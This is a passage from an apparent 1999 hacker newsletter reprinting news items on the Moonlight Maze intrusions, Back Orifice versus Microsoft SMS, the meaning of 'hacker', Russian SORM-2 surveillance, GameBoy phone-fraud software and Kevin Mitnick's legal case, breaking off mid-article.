  2811.      warfare capabilities to respond to such attacks. But Weldon,
  2812.      describing dependence on computer systems as "the Achilles
  2813.      heel of developed nations", said this is not enough. He is
  2814.      advocating the creation of a unit in the Pentagon under a senior
  2815.      commander to oversee the defence of computer systems. 
  2816.      
  2817.      According to other experts, America has been so preoccupied
  2818.      with beating the Y2K (year 2000) or millennium bug - a
  2819.      programming problem that could paralyse computers on the
  2820.      first stroke of the new year - that its military, scientific and
  2821.      commercial communities have neglected the overall security of
  2822.      their computer systems. 
  2823.      
  2824.      At the same time, the huge number of systems being
  2825.      overhauled to make them Y2K-compliant has heightened the
  2826.      risk of infiltration. 
  2827.      
  2828.      Alarmed by the theft of military documents whisked to Russia,
  2829.      American officials argue that the country should brace itself
  2830.      for other, equally disturbing forms of information warfare that,
  2831.      in theory, could bring the country to its knees. 
  2832.      
  2833.      China, Libya and Iraq are developing information warfare
  2834.      capabilities and, according to one White House official, "we
  2835.      see well-funded terrorist groups that also have such
  2836.      capabilities". 
  2837.      
  2838.      A series of war games conducted by experts last year
  2839.      revealed that the world's greatest superpower could be at the
  2840.      mercy of a handful of determined computer hackers paralysing
  2841.      airports, markets and military systems with a few taps on a
  2842.      computer laptop. 
  2843.      
  2844.      Suspicions that Russia is responsible are based partly on the
  2845.      involvement of Moscow-based internet servers in some
  2846.      attacks. But experts caution that evidence of a Russian hand in
  2847.      the operation may not signal a Kremlin connection. 
  2848.      
  2849.      "It could turn out to be Russian organised crime," said one
  2850.      expert. "And they could be acting as a front for the intelligence
  2851.      community." 
  2852.      
  2853.      Ironically, the Russians are pressing for an international treaty
  2854.      to freeze information warfare. "We cannot permit the
  2855.      emergence of a fundamentally new area of international
  2856.      confrontation," Sergei Ivanov, the former Russian foreign
  2857.      minister, wrote in a letter to Kofi Annan, the United Nations
  2858.      secretary-general in October. 
  2859.      
  2860.      Subsequently, Russia's relations with America have reached
  2861.      their lowest ebb since the cold war because of Nato's
  2862.      intervention in Yugoslavia. Relations with China have also
  2863.      suffered. An offensive in cyberspace may be their one way of
  2864.      retaliating without getting into a shooting war. 
  2865.  
  2866.       
  2867.       The Australian      
  2868.       http://www.theaustralian.com.au/world/4161044.htm
  2869.       
  2870.      
  2871.  
  2872.  
  2873.       US losing cyber war to Russian hackers
  2874.       From MATTHEW CAMPBELL of The Sunday Times in Washington
  2875.     
  2876.       26jul99
  2877.     
  2878.       US officials believe Russia may have stolen some of Washington's most
  2879.       sensitive military secrets, including weapons guidance systems and
  2880.       naval intelligence codes, in an espionage offensive that investigators
  2881.       have called Operation Moonlight Maze. 
  2882.     
  2883.       The intelligence action, whose damage to the US could exceed that
  2884.       caused by Chinese espionage in nuclear laboratories, involved computer
  2885.       hacking in the past six months. 
  2886.     
  2887.       The operations were so sophisticated that security experts trying to
  2888.       build defences against further incursions believe the US may be losing
  2889.       the world's first cyber war. 
  2890.     
  2891.       Investigators suspect Russia is behind the series of hits against US
  2892.       computer systems since January. In one case, a US technician trying to
  2893.       track a computer intruder watched in amazement as a secret document
  2894.       from a naval facility was hijacked to Moscow from under his nose. 
  2895.     
  2896.       In a secret briefing on Moonlight Maze, deputy Defence Secretary John
  2897.       Hamre told a congressional committee: "We are in the middle of a cyber
  2898.       war." 
  2899.     
  2900.       Besides military computer systems, private research and development
  2901.       institutes have been plundered, US officials say. Such institutes are
  2902.       reluctant to discuss losses, which experts claim amount to hundreds of
  2903.       millions of dollars. 
  2904.     
  2905.       "It is impossible to overstate the seriousness of this problem. The
  2906.       President is very concerned about it," a White House official said. 
  2907.     
  2908.       The offensive began early this year, when a startling new method of
  2909.       hacking into US computer systems was detected. 
  2910.     
  2911.       A military computer server near San Antonio, Texas, was infiltrated for
  2912.       several days by hackers who had entered the system, through an
  2913.       overseas site on the Internet. 
  2914.     
  2915.       Dozens of security violations ensued at other military facilities, and
  2916.       even at the Pentagon, the US military headquarters in Washington.
  2917.       When research laboratories also reported Internet incursions, officials
  2918.       realised a cyber invasion was under way. 
  2919.     
  2920.       "There were deliberate and highly co-ordinated attacks occurring in our
  2921.       defence department systems that appeared to be coming from one
  2922.       country," said Curt Weldon, chairman of the congressional committee
  2923.       for military research and development. 
  2924.     
  2925.       "Such a thing has never happened before. It's very real and very
  2926.       alarming." 
  2927.     
  2928.       Even top-secret military installations, whose expertise is intelligence
  2929.       security, have been breached. 
  2930.     
  2931.       At the Space and Naval Warfare Systems Command in San Diego,
  2932.       California, which specialises in safeguarding naval intelligence codes,
  2933.       engineer Ron Broersma was alerted to the operation when a computer
  2934.       print-out took an unusually long time. 
  2935.     
  2936.       To his amazement, monitoring checks showed the top-secret file had
  2937.       been removed from the printing queue and transmitted to an Internet
  2938.       server in Moscow before being sent back to San Diego. 
  2939.     
  2940.       Alerted to the threat of Moonlight Maze, President Bill Clinton has called
  2941.       for an extra $US600 million ($923 million) to fund a variety of security
  2942.       initiatives, including an infrastructure protection centre in the FBI to
  2943.       gauge the vulnerability of computer systems. 
  2944.     
  2945.       The White House has ordered the US military to develop its own
  2946.       information warfare capabilities. US officials warn other forms of
  2947.       electronic attack could potentially bring the country's military to its
  2948.       knees. 
  2949.     
  2950.       China, Libya and Iraq are developing information warfare capabilities.
  2951.       And one White House official says: "We see well-funded terrorist groups
  2952.       that also have such capabilities."  
  2953.       
  2954.       @HWA
  2955.      
  2956. 19.0  BO2K and SMS, Which One is Evil? 
  2957.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2958.       
  2959.       From HNN http://www.hackernews.com/
  2960.       
  2961.       contributed by maierj 
  2962.       We missed this last Friday but Jim Louderback, over at
  2963.       ZD Net has some interesting comments regarding SMS
  2964.       and BO2K. Last week cDc challenged MS to recall SMS.
  2965.       cDc says that SMS has the same feature set as BO2K,
  2966.       and since BO2K is being classified as a Virus/Trojan then
  2967.       SMS must be one to. Jim asks the question just what is
  2968.       a virus anyway? 
  2969.  
  2970.       ZD Net
  2971.       http://www.zdnet.com/zdnn/stories/comment/0,5859,2300632,00.html
  2972.       
  2973.      --------------------------------------------------------------
  2974.      This story was printed from ZDNN,
  2975.      located at http://www.zdnet.com/zdnn.
  2976.      --------------------------------------------------------------
  2977.      
  2978.      Virus identity beginning to blur
  2979.      By Jim Louderback, ZDTV
  2980.      July 23, 1999 10:49 AM PT
  2981.      URL: http://www.zdnet.com/zdnn/stories/comment/0,5859,2300632,00.html
  2982.      
  2983.      So what is, or what is not a virus? That question took an interesting turn last week. 
  2984.      
  2985.      The kind folks over at Cult of the Dead Cow launched a counter-attack at Microsoft. Their new
  2986.      Back Orifice product, which allows remote monitoring and administration of computers over a LAN
  2987.      or the Internet, has come under fire from many quarters. Because after a surreptitious install it is
  2988.      virtually undetectable by the end user, many are calling it a Trojan Horse. 
  2989.      
  2990.      But a Trojan Horse is actually a program that calls itself one thing, but turns out to be something
  2991.      else. Unless a hacker or cracker developed a seemingly benign program that secretly installed Back
  2992.      Orifice's Server, it's just a program that does some powerful and possibly nasty things. 
  2993.      
  2994.      But Microsoft and others have been bashing Back Orifice. Symantec included Back Orifice server
  2995.      detection in their Anti-Virus product. And up on Microsoft's security site, they're calling Back
  2996.      Orifice 'malicious' -- primarily because it "Includes stealth behavior that has no purpose other than to
  2997.      make it difficult to detect." 
  2998.      
  2999.      But apparently that old stone and glass-house adage applies here. Microsoft's own Systems
  3000.      Management Server (a.k.a. SMS) happens to have features surprisingly 'malicious' -- just like Back
  3001.      Orifice. SMS, in fact, does let you remotely control a user's PC without the client being aware of it.
  3002.      Apparently Microsoft included this feature at the request of their customers. 
  3003.      
  3004.      It should come as no surprise that some Microsoft actions could be characterized as malicious.
  3005.      Actually it's refreshing to have them finally admit it. And I got a good chuckle when the Cult of the
  3006.      Dead Cow issued a press release challenging Microsoft to recall SMS. And it's folly to assume that
  3007.      Symantec would scan for SMS in Norton AntiVirus, along with Back Orifice. 
  3008.      
  3009.      But it still raises the question of what is a virus. That feature is a useful tool when respected
  3010.      software vendor Microsoft sells it for many hundreds of dollars. But when a company calling
  3011.      themselves, "the most influential group of hackers in the world" includes that same feature, and gives
  3012.      it away for free, suddenly it's a virus. 
  3013.      
  3014.      But that's not all. It seems that many PC vendors have been shipping an ActiveX control that
  3015.      unknowingly opens up a user's system to rape and pillage. The HP version of the control allows an
  3016.      e-mail to automatically download a program locally, install it and run it. The SystemWizard Launch
  3017.      ActiveX control can be executed from an Outlook or Outlook Express client. According to Pharlap
  3018.      CEO Richard Smith, similar versions of this control are shipped on many major computer systems
  3019.      (but not all of them -- my IBM ThinkPad is safe). For more information on this topic, head over to
  3020.      www.tiac.net/users/smiths/acctroj/index.htm. 
  3021.      
  3022.      So is the SystemWizard Launch ActiveX control a virus? Well it certainly has some elements of a
  3023.      Trojan horse. It sits on your PC, looking benign, until someone executes it in the right way. And it
  3024.      can severely compromise your security -- this is a perfect way to deliver Back Orifice or SMS, for
  3025.      instance. Should Symantec's Norton Anti-Virus scan for this control as well? Or should you just turn
  3026.      ActiveX off in your browser? 
  3027.      
  3028.      I'm not sure I have an answer, but these lines are going to continue to blur. And as we connect more
  3029.      and more devices up the Internet, including phones, appliances and set-top boxes, "malicious"
  3030.      programs will have even more fertile ground to spread. And man, I'd hate to have my freezer
  3031.      infected with a virus. 
  3032.      
  3033.      @HWA
  3034.      
  3035. 20.0 The Last True Hacker 
  3036.      ~~~~~~~~~~~~~~~~~~~~~
  3037.      
  3038.      From HNN http://www.hackernews.com/
  3039.        
  3040.      contributed by found on slashdot 
  3041.      So what exactly is a 'hacker'. Do the ethical hackers in
  3042.      the IBM ads count? Is Richard Stallman, as Steven Levy
  3043.      called him, the last true hacker? What about Linus Torvalds? 
  3044.  
  3045.      Boston Globe      
  3046.      http://www.boston.com/dailyglobe2/206/business/Scientists_and_hackers+.shtml
  3047.      
  3048.      ECONOMIC PRINCIPALS Scientists and hackers 
  3049.  
  3050.      By David Warsh, Globe Staff, 07/25/99 
  3051.  
  3052.         If the essence of politics is to be found in the shifting meaning of words,
  3053.          then few words carry a more interesting charge these days than
  3054.      ''hacker.'' 
  3055.  
  3056.      For example, as one of a series of recent ads, IBM Corp. has been parading a
  3057.      photograph of employee Nick Simicich, ''Ethical Hacker.'' Flowing-bearded,
  3058.      fish-shirted, felt-hatted, granny-glassed, Simicich is described as a ''paid
  3059.      professional paranoid.''
  3060.  
  3061.      His job: to determine whether software systems are susceptible to hackers.
  3062.      His distinction: He protected the electrical power infrastructure in the United
  3063.      States from ''cyber-jackers bent on misdirecting electricity with bogus
  3064.      information.'' 
  3065.  
  3066.      So much for the limits of the current definition of hacker: the principled
  3067.      tester-of-limits vs. the high-tech saboteur.
  3068.  
  3069.      But if you listen carefully to the leading innovators in computer systems, you
  3070.      realize that the applicability of the term is expanding rapidly.
  3071.  
  3072.      Consider the story of how Linus Torvalds, and not Richard Stallman of the
  3073.      Massachusetts Institute of Technology, came to pose the chief threat to the
  3074.      world's first centibillionaire, Bill Gates. 
  3075.  
  3076.      Stallman would seem to be the hacker par excellence - ''the last true hacker,''
  3077.      as author Steven Levy called him in his famous book. Even though it was
  3078.      Harvard College that he entered in 1970, it was down the street at MIT that
  3079.      Stallman found his spiritual home. There he imbibed deeply the peculiar
  3080.      sensibility that is one of MIT's enduring contributions to computer culture.
  3081.  
  3082.      He rendered a small jewel of a hack of one sort a few years ago when he
  3083.      posted an official-looking sign on the spot that serves as the Wellesley
  3084.      terminus of the shuttle bus that has connected Wellesley College and MIT
  3085.      since the mid-1960s.
  3086.  
  3087.      Barbedall Square, it read. At the MIT end of the line, of course, is Kendall
  3088.      Square. (It helps to say them out loud.)
  3089.  
  3090.      Such is the world of an MIT hacker: high-spirited, clever, accomplished, and,
  3091.      just possibly, but not necessarily, oriented to the occasional countercultural
  3092.      prank. According to Stallman, the use of ''hacker'' to mean ''security breaker''
  3093.      is mass media confusion. Hackers themselves, he says, use the word to mean
  3094.      ''Someone who loves to program and enjoys being clever at it.''
  3095.  
  3096.      Stallman's significance goes far beyond a few practical jokes, however. It was
  3097.      in 1981 that a little start-up company known as Symbolics Inc. hired away
  3098.      most of the staff of MIT's Artificial Intelligence Lab and set them to work
  3099.      writing proprietary software. 
  3100.  
  3101.      At about the same time, Digital Equipment introduced its new VAX
  3102.      computers, with brand-new proprietary operating systems. The community of
  3103.      pioneering software sharers that had grown out of the Model Railroad Club at
  3104.      MIT suddenly collapsed.
  3105.  
  3106.      So Stallman did a historic thing. Instead of joining the proprietary world, he set
  3107.      out to make a free, shareable operating system that would work on any
  3108.      computer and run any program. There would be none of the nondisclosure
  3109.      agreements that characterized the nascent software industry. 
  3110.  
  3111.      Stallman dubbed his ambitious project the GNU system. 
  3112.  
  3113.      But first there would have to be tools. His first big achievement was EMACS,
  3114.      a compiler and text editor that rendered possible more ambitious programming.
  3115.      Other programs followed.
  3116.  
  3117.      All were freely made available to others under the ''copyleft'' license Stallman
  3118.      and his friends devised to keep the underlying source code open - that is, to
  3119.      protect the right of other users to know and modify the basic code.
  3120.  
  3121.      Stallman's Waterloo was the operating system's ''kernel,'' the core part of the
  3122.      operating system where memory is allocated among all the other programs:
  3123.      scheduling, signalling, device input/output, and so on. 
  3124.  
  3125.      When Stallman turned his shoulder to the task in 1990, the dogma among
  3126.      computer scientists in cutting-edge American universities such as MIT was
  3127.      that something called a ''microkernel'' would be required to make a truly
  3128.      portable system. A microkernel would be a kind of coded general theory of all
  3129.      computer architectures; it would be required before such a system could run
  3130.      on any hardware.
  3131.  
  3132.      Cut to Helsinki in 1991. A young Finnish graduate student named Linus
  3133.      Torvalds, comfortably outside the circuits of grant-supported American
  3134.      computer science research, decided to try an alternative approach - a
  3135.      ''monolithic kernel,'' simpler, but far faster and already relatively
  3136.      well-understood. ''I am a pragmatic person,'' Torvalds has written. '' ... I didn't
  3137.      have to aim for such a lofty goal. I was interested in portability between real
  3138.      world systems, not theoretical systems.''
  3139.  
  3140.      So Torvalds read up on the systems in use, in search of common denominators
  3141.      between them. Once he had a design for a certain task - for memory
  3142.      management, say - that would be on the most popular chips, he put it out to an
  3143.      extensive list of correspondent hackers to see how it could be improved. At
  3144.      first it was written to suit just one architecture: the Intel 386.
  3145.  
  3146.      Gradually a kernel emerged that could control the most popular
  3147.      microprocessors - the 68K, the Sparc, the Alpha and the Power PC. Torvalds
  3148.      then combined his kernel with a good bit of the GNU programs Stallman and
  3149.      his friends had written, and presto! The operating system that has become
  3150.      known as Linux - similar in spirit to AT&T's Unix system but not based on it -
  3151.      was ready to be distributed and more or less continually improved. 
  3152.  
  3153.      And because it had been written - hacked - by an impassioned graduate
  3154.      student in Finland and a relentless code warrior in Cambridge and a few
  3155.      hundred collaborators for their individual satisfaction and shared use, it was
  3156.      available to others for free. And in the last 10 years the project originally
  3157.      envisaged by Stallman and Torvalds and a handful of others has grown into a
  3158.      credible threat to Windows NT - the Microsoft operating system with its
  3159.      secret proprietary source code on which rests Bill Gates' most basic hopes for
  3160.      the 21st century.
  3161.  
  3162.      ''Linux today has millions of users, thousand of developers, and a growing
  3163.      market,'' Torvalds has written in ''Open Sources: Voices from the Open
  3164.      Source Revolution,'' the O'Reilly & Associates anthology from which this
  3165.      account is drawn. ''I'd like to say I knew this would happen, that it's all part of
  3166.      the plan for world domination.
  3167.  
  3168.      ''But honestly this has all taken me a bit by surprise. I was much more aware
  3169.      of the transition from one Linux user to one hundred Linux users than the
  3170.      transition from one hundred to one million.''
  3171.  
  3172.      And the point? Simply that the neatly barbered and quietly circumspect
  3173.      Torvalds is every bit as much a hacker as Stallman - a fact the flamboyant
  3174.      Stallman readily concedes. 
  3175.  
  3176.      So what is a hacker, after all? Eric Raymond offers this definition in the third
  3177.      edition of his New Hacker's Dictionary: ''A person who enjoys exploring the
  3178.      details of programmable systems and how to stretch their capabilities, as
  3179.      opposed to most users, who prefer to learn only the minimum necessary.''
  3180.      Torvalds' success suggests that even that definition may be too narrow.
  3181.  
  3182.      Remember, it was only 150 years ago that thinkers and wordsmiths of all sorts
  3183.      were trying to agree on a term that could apply equally to all the different sorts
  3184.      of intellectuals who had emerged from the precincts of philosophy and natural
  3185.      history. It seemed clear these new professionals shared an ethic. Their
  3186.      methods and goals were unfamiliar and, quite possibly unique. They even
  3187.      admitted women to their ranks!
  3188.  
  3189.      In the England of the 1830s, it took a decade before the term ''scientist''
  3190.      emerged and won common acceptance. 
  3191.  
  3192.      This story ran on page G01 of the Boston Globe on 07/25/99. 
  3193.      ⌐ Copyright 1999 Globe Newspaper Company. 
  3194.  
  3195.      @HWA
  3196.      
  3197. 21.0 One Russian ISP Standing Up to FSB 
  3198.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3199.      
  3200.      From HNN http://www.hackernews.com/
  3201.      
  3202.       contributed by Arik 
  3203.       ISP Bayard-Slavia Communications is refusing to go
  3204.       along with SORM-2 (System of Efficient Research
  3205.       Measures 2). In a supposed effort to reveal tax evaders
  3206.       and other criminals SORM-2 gives Russia's Federal
  3207.       Security Service (FSB) the right to look into private
  3208.       e-mail without a warrant. SORM-2 calls for ISPs to
  3209.       install special listening equipment to keep its ISP
  3210.       license. Bayard-Slavia is the only ISP we have heard of
  3211.       that is refusing to go along with these provisions. 
  3212.  
  3213.       Information Week
  3214.       http://www.techweb.com/wire/story/TWB19990726S0003
  3215.       
  3216.       Russian ISP Refuses To Spy On Customers
  3217.       (07/26/99, 6:35 a.m. ET)
  3218.       By Marina Moudrak, Data Communications 
  3219.  
  3220.       At least one Russian ISP is refusing to go along
  3221.       with a directive that lets the government spy on
  3222.       customers -- and it's paying the price. 
  3223.  
  3224.       The directive is known as System of Efficient
  3225.       ResearchMeasures 2 (SORM 2), and it gives Russia's
  3226.       Federal Security Service (FSB) the right to look into
  3227.       private e-mail without a warrant, under the pretense of
  3228.       sniffing out tax dodgers and corruption. 
  3229.  
  3230.       It also calls for ISPs to pay for surveillance equipment in
  3231.       their servers and a link to FSB headquarters in Moscow. 
  3232.  
  3233.       But ISP Bayard-Slavia Communications is refusing to go
  3234.       along with SORM-2, and now the government is taking
  3235.       action. 
  3236.  
  3237.       According to Bayard-Slavia director general Nail
  3238.       Murzakhanov, the FSB tried to shut down the ISP by
  3239.       withdrawing its license and challenging its right to
  3240.       frequencies used for its satellite connection to Moscow. 
  3241.  
  3242.       Eventually, it found a way to freeze the ISP's bank
  3243.       account so it couldn't pay for the satellite connection at
  3244.       all. 
  3245.  
  3246.       "We will never help the FSB implement illegal
  3247.       shadowing," Murzakhanov said. "We're the first ISP to
  3248.       struggle against illegal information collection.
  3249.       Unfortunately, we're also likely to become the first to be
  3250.       destroyed because of insubordination."  
  3251.  
  3252.      @HWA      
  3253.      
  3254. 22.0 GameBoy Steals Cars and Makes Free Calls 
  3255.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3256.  
  3257.      From HNN http://www.hackernews.com/
  3258.      
  3259.       contributed by doc 
  3260.       A GameBoy, GameBoy Pocket, or GameBoy Color has
  3261.       software available with the ability to turn your GameBoy
  3262.       into a RedBox (Toll Fraud Device) This software has
  3263.       been around for a while. These GUI based applications
  3264.       allow you use you GameBoy to make free long distance
  3265.       calls, crack answering machine passwords, and just use
  3266.       it as a tone dialer. Well the new GameBoy Color has an
  3267.       interesting feature, an IR port. As mentioned on HNN
  3268.       and elsewhere a few months ago there are vehicles that
  3269.       use IR as a locking mechanism. With currently available
  3270.       software you can now teach your GameBoy various IR
  3271.       codes including those to unlock vehicles. Wondering
  3272.       how you get these programs into your GameBoy? Well,
  3273.       Nintendo recently lost the court case against the
  3274.       person making and selling GameBoy ROMS which makes
  3275.       it real easy to transfer files around. Another example of
  3276.       how it is not the tool that is malicious but the user. 
  3277.  
  3278.       Ratb0y's Homepage    
  3279.       http://homepages.go.com/~ratb0y/gameboy.htm
  3280.       
  3281.       @HWA
  3282.       
  3283. 23.0 Mitnick Retains High Profile Lawyer For State Case 
  3284.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  3285.      
  3286.      From HNN http://www.hackernews.com/
  3287.  
  3288.       contributed by Ryan 
  3289.       Kevin Mitnick's sentencing for the Federal charges he
  3290.       has already pleaded guilty to was delayed again
  3291.       yesterday. In the meantime Kevin has retained well
  3292.       known defense attorney Tony Serra, to handle his state
  3293.       charges. This is a expose that does a decent job of
  3294.       giving a broad over view of the legal side of the Kevin
  3295.       Mitnick case. 
  3296.  
  3297.       Cal Law - Tony Serra Profile
  3298.       http://www.callaw.com/weekly/feata726.html
  3299.       
  3300.       Wired- Sentencing Delayed       
  3301.       http://www.wired.com/news/news/politics/story/20953.html
  3302.       
  3303.       -=-
  3304.       
  3305.       
  3306.       The Hacker and the Toker 
  3307.       With the L.A. district attorney's office on his case, Kevin Mitnick hopes
  3308.       Tony Serra will help him beat the rap 
  3309.  
  3310.  
  3311.       By Paul Elias , Omar Figueroa and Carolyn Hagin 
  3312.                           
  3313.  
  3314.  
  3315.  
  3316.      Tony Serra doesn't use a computer. He has never surfed
  3317.      the Net. On the whole, he'd rather sit in front of the fire with
  3318.      some 19th century American literature and enough marijuana
  3319.      to stone an elephant.
  3320.  
  3321.      The famous San Francisco defense lawyer is your basic
  3322.      hash-smoking Luddite.
  3323.  
  3324.      "My wife has a computer," he says. "She's on it every night.
  3325.      I can't get her off the fucking thing."
  3326.  
  3327.      It's no surprise then, that Serra has never defended anyone
  3328.      accused of a computer crime. He hasn't even come close in
  3329.      his 37-year legal career. "I do dope and murder, man," he
  3330.      says. "That's all I've done my entire life." As in defending the
  3331.      likes of Proposition 215, Black Panther Huey Newton and
  3332.      Ellie Nesler, the woman convicted of gunning down her
  3333.      child's molester.
  3334.  
  3335.      Serra once offered to defend Ted Kaczynski -- the king of
  3336.      the Luddites -- by invoking Kaczynski's anti-technology
  3337.      views. The Unabomber readily accepted the offer but a
  3338.      judge wouldn't allow it.
  3339.  
  3340.      But all of that was before Kevin Mitnick, the most revered
  3341.      martyr of hackerdom, placed a collect call to Serra's office
  3342.      last month looking for pro bono representation.
  3343.  
  3344.      Mitnick is the most notorious member of an emerging class
  3345.      of cybercriminals. Over the last decade, he has faced three
  3346.      federal prosecutions for hacking into other people's
  3347.      computers and related charges, and is now facing a case in
  3348.      state court.
  3349.  
  3350.      Luckily for Mitnick -- and for Serra -- the hacker's call was
  3351.      fielded by one of two bright acolytes who work in Serra's
  3352.      office, housed on a pier along the San Francisco waterfront.
  3353.      The two young lawyers then fiercely lobbied Serra to take
  3354.      the case, a single count of computer hacking that's being
  3355.      prosecuted by L.A. District Attorney Gil Garcetti's office.
  3356.      The charge was actually filed seven years ago, but Mitnick
  3357.      has yet to be arraigned. "Tony wasn't very excited about it at
  3358.      first," recalls Omar Figueroa, the 28-year-old lawyer who
  3359.      talked to Mitnick first.
  3360.  
  3361.      But when Figueroa and colleague Carolyn Hagin, 27,
  3362.      explained to Serra that the case was bigger than a mere
  3363.      fraud case -- that it came complete with a big counterculture
  3364.      community that knows how to get good press and involved a
  3365.      new civil rights frontier -- Serra relented. But with one
  3366.      proviso: Figueroa and Hagin would have to do all of the
  3367.      pretrial work, then give Serra a crash course in technology
  3368.      on the eve of trial. It's an arrangement that suits everybody
  3369.      just fine. "I've always had an interest in cybercrime," says
  3370.      Hagin. "It's part of our generation."
  3371.  
  3372.      Now even the 64-year-old Serra, who knows far more about
  3373.      Tibetan prayer flags and Native American rituals than he
  3374.      does about HTML and encryption, says he's looking forward
  3375.      to going to trial. "I view this as a political case," he says.
  3376.      Indeed, political cases are Serra's specialty, and he is the
  3377.      poet laureate of defense attorneys who successfully cast
  3378.      their clients as victims of oppressive government forces.
  3379.      "Political case" is also code for "good ink."
  3380.  
  3381.      Serra said the same thing about the Mendocino County
  3382.      murder trial of Eugene "Bear" Lincoln, a Native American
  3383.      who was accused of killing a white deputy sheriff during a
  3384.      shoot-out on a reservation in 1995.
  3385.  
  3386.      Press coverage was extensive and mostly favorable as Serra
  3387.      successfully turned the tables on Mendocino County
  3388.      prosecutors and sheriffs -- and the entire power structure of
  3389.      the area -- by arguing that Native Americans had suffered
  3390.      centuries worth of abuse and discrimination. An all-white
  3391.      jury acquitted Lincoln in 1997, believing he acted in
  3392.      self-defense.
  3393.  
  3394.      Word of Serra's victory circulated through the state's jails
  3395.      and prisons. Mitnick, along with much of the inmate
  3396.      population, was impressed by Serra's work on that case, and
  3397.      it reportedly prompted him to call Serra as his own case
  3398.      neared trial.
  3399.  
  3400.      Kevin Mitnick may not hold a college degree, but he is
  3401.      certainly no Luddite.
  3402.  
  3403.      Long before the Internet became a household staple and
  3404.      years before Yahoo and bandwidth emerged as
  3405.      commonplace jargon, the self-taught Mitnick was a
  3406.      cyberspace juvenile delinquent.
  3407.  
  3408.      At 17, Mitnick spent three months in L.A.'s Juvenile
  3409.      Detention Center for destroying Pacific Bell computer data.
  3410.      Two years later, in 1983, University of Southern California
  3411.      campus police arrested Mitnick while he was sitting at a
  3412.      computer in the school's terminal room, attempting to break
  3413.      into a Pentagon computer. He spent six months in a
  3414.      California Youth Authority prison after that arrest. But his
  3415.      two brief stints behind bars as a teen-ager seemed only to
  3416.      embolden him as an adult.
  3417.  
  3418.      Instead of using his computer skills for gainful employment,
  3419.      Mitnick couldn't shake his compulsion to hack. All of the
  3420.      myriad profiles of Mitnick available online paint him as the
  3421.      quintessential computer geek motivated not by money but by
  3422.      the ability to access highly sensitive information for the hell
  3423.      of it. He just couldn't resist the siren song of forbidden
  3424.      access.
  3425.  
  3426.      In 1987, he was arrested and convicted by a state court of
  3427.      stealing software from a software company and sentenced
  3428.      to 36 months of probation. Two years later, he pleaded guilty
  3429.      in federal court to breaking into a Digital Equipment Corp.
  3430.      computer, after which Los Angeles U.S. District Judge
  3431.      Mariana Pfaelzer sentenced him to a year in a prison and six
  3432.      months of therapy to combat his computer "addiction."
  3433.  
  3434.      In 1992, while Mitnick was working at the Tel Tec Detective
  3435.      Agency, the FBI -- suspecting that he was illegally using a
  3436.      commercial database system -- launched yet another
  3437.      investigation into his activities. Pfaelzer soon issued an arrest
  3438.      warrant for Mitnick, who was charged with one count of
  3439.      hacking and one count of violating the terms of his 1989
  3440.      probation. But when federal authorities showed up to arrest
  3441.      him, Mitnick had vanished, and a two-year, high-tech
  3442.      cat-and-mouse game with his pursuers began. He ultimately
  3443.      made the FBI's most-wanted list.
  3444.  
  3445.      At one point, in late 1992, investigators from the California
  3446.      Department of Motor Vehicles almost caught Mitnick.
  3447.      Someone using a valid law enforcement requestor code
  3448.      called the DMV and requested that a photo of a police
  3449.      informer be faxed to a number in Studio City. The number
  3450.      turned out to be a Kinko's copy center, and Mitnick was
  3451.      seen leaving the store with the fax. But Mitnick spotted the
  3452.      investigators, dropped the fax and outran them.
  3453.  
  3454.      Federal authorities finally arrested Mitnick in February 1995
  3455.      in Raleigh, N.C., after an extensive manhunt, which had
  3456.      been fueled by front-page coverage in The New York Times
  3457.      .
  3458.  
  3459.      He quickly agreed to plead guilty to violating his probation
  3460.      and to a new hacking charge filed by federal prosecutors in
  3461.      Raleigh and was sentenced to 22 months in prison. He was
  3462.      soon transferred to the Federal Detention Center in Los
  3463.      Angeles, where he faced 25 more counts of hacking and
  3464.      illegal copying of information during digital break-ins of
  3465.      companies, including Sun Microsystems Inc.
  3466.  
  3467.      In March of this year, he cut a plea bargain with federal
  3468.      prosecutors that requires him to serve an additional year in
  3469.      federal custody. In theory, he could move into a halfway
  3470.      house as early as next month to finish out his sentence.
  3471.  
  3472.      Though he pleaded guilty to the high-tech crimes against Sun
  3473.      and others, Mitnick claims he didn't share the information
  3474.      with anybody. Prosecutors and the victimized companies
  3475.      claim that $150 million worth of their research and
  3476.      development has been ruined.
  3477.  
  3478.      The government, though, is asking the court to order Mitnick
  3479.      to pay a more modest $1.5 million in restitution. But Mitnick's
  3480.      court-appointed lawyers, led by Donald Randolph of Santa
  3481.      Monica's Randolph & Levanas, contend that Mitnick caused
  3482.      little, if any, actual damage. They're arguing for a $5,000
  3483.      fine. Pfaelzer has scheduled a hearing on the subject for July
  3484.      26.
  3485.  
  3486.      Bespectacled and pudgy, Mitnick now uses his abundant
  3487.      nervous energy to review the case against him. He spends
  3488.      most of his waking hours poring over court documents and
  3489.      constantly calling his attorneys to discuss his case. "He
  3490.      reviews his case in detail," says Hagin, of Serra's office.
  3491.      "He's an extremely intelligent guy."
  3492.  
  3493.      Once Mitnick settles his federal affairs, he still has to
  3494.      contend with the L.A. DA's single charge of computer fraud
  3495.      for allegedly duping the DMV to fax him the informer's
  3496.      photo.
  3497.  
  3498.      It is that charge that may prevent him from getting into a
  3499.      halfway house to serve out the rest of his federal sentence.
  3500.      No bail in the state case, no halfway house. In fact, Mitnick
  3501.      fears prosecutors will try to have him moved from the
  3502.      federal jail to the dreaded county jail.
  3503.  
  3504.      "We've been waiting to prosecute him for five years," says
  3505.      L.A. Deputy District Attorney Larry Diamond, who brushes
  3506.      off criticism that the state charge and the $1 million bail
  3507.      amount to overkill. "Because he wants to finish his [federal]
  3508.      sentence in a halfway house," an unsympathetic Diamond
  3509.      retorts, "Kevin wants special treatment."
  3510.  
  3511.      In fact, argues Diamond, Mitnick has been receiving special
  3512.      treatment since Pfaelzer first put him on probation in 1989
  3513.      for hacking. The 25-year veteran of the DA's office is
  3514.      unimpressed with just about every aspect of Mitnick's case.
  3515.      He dismisses Mitnick as "just another case" and Serra as
  3516.      "just another defense attorney." As for his view of Pfaelzer:
  3517.      "She's coddled 'poor Kevin' from day one."
  3518.  
  3519.      Diamond also rejects the argument that the bail is excessive
  3520.      -- the bail schedule calls for $25,000 -- saying Mitnick has
  3521.      been a "notorious fugitive."
  3522.  
  3523.      But Diamond reserves his harshest criticism for the federal
